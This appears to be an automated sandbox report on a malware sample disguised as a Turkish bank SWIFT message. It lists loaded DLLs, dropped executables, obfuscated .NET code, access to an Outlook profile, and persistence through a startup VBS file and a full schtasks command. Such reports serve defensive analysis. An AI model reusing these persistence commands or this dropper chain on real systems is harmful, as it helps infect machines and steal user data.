Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Section loaded: cryptbase.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\server01.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Static file information: File size 1266176 > 1048576

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: tC:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 0000000D.00000002.1515819016.0000000001691000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: RegSvcs.exe, 0000000D.00000002.1515819016.00000000015DA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: RegSvcs.exe, 00000003.00000002.1367391345.0000000002CB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1368343181.0000000003EA5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1365681539.00000000029D1000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.1534729532.000000000314C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: directiveness.exe, 00000002.00000003.1352506746.0000000004390000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 00000002.00000003.1352766385.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 0000000C.00000003.1480054505.0000000004270000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 0000000C.00000003.1481253837.0000000004130000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: directiveness.exe, 00000002.00000003.1352506746.0000000004390000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 00000002.00000003.1352766385.00000000041F0000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 0000000C.00000003.1480054505.0000000004270000.00000004.00001000.00020000.00000000.sdmp, directiveness.exe, 0000000C.00000003.1481253837.0000000004130000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: orlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 0000000D.00000002.1515819016.00000000015FA000.00000004.00000020.00020000.00000000.sdmp

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 3.2.RegSvcs.exe.2cb0ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.RegSvcs.exe.2a12e3e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.RegSvcs.exe.3ee0190.13.raw.unpack, WP6RZJql8gZrNhVA9v.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Source: Trading_AIBot.exe.3.dr

Static PE information: 0xAA16B5AE [Fri Jun 4 22:50:22 2060 UTC]

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000BE01E LoadLibraryA,GetProcAddress,

0_2_000BE01E

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000B288A push 66000B23h; retn 0011h	0_2_000B28E1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000C6B05 push ecx; ret	0_2_000C6B18
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00616B05 push ecx; ret	2_2_00616B18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C40C push cs; iretd	3_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00423149 push eax; ret	3_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C50E push cs; iretd	3_2_0041C4E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004231C8 push eax; ret	3_2_00423179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E21D push ecx; ret	3_2_0040E230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C6BE push ebx; ret	3_2_0041C6BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02BB43A1 push cs; iretd	3_2_02BB43A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_02BB4752 pushad ; retf	3_2_02BB4755
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04E2632D push eax; ret	6_2_04E26341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_04E23ACD push ebx; retf	6_2_04E23ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_07CB569D push esi; retf	6_2_07CB569E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_07CB4E90 push eax; retf	6_2_07CB500E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_07CB0CE8 push cs; retf	6_2_07CB0E0E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_07CB1BE0 push ds; retf	6_2_07CB1EE6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_07CB528D push edx; retf	6_2_07CB528E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_07CB5000 push eax; retf	6_2_07CB500E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_031D4752 pushad ; retf	13_2_031D4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_031D43A1 push cs; iretd	13_2_031D43A7
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_0167F2F0 push eax; ret	17_2_0167F2F1
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Code function: 17_2_0637649C push es; ret	17_2_063764A4

Source: 3.2.RegSvcs.exe.2cb0ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'gupuXCg5Uo29i', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.RegSvcs.exe.2a12e3e.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'gupuXCg5Uo29i', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 3.2.RegSvcs.exe.3ee0190.13.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'gupuXCg5Uo29i', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	File created: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\server01.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:50 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\directiveness.vbs			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
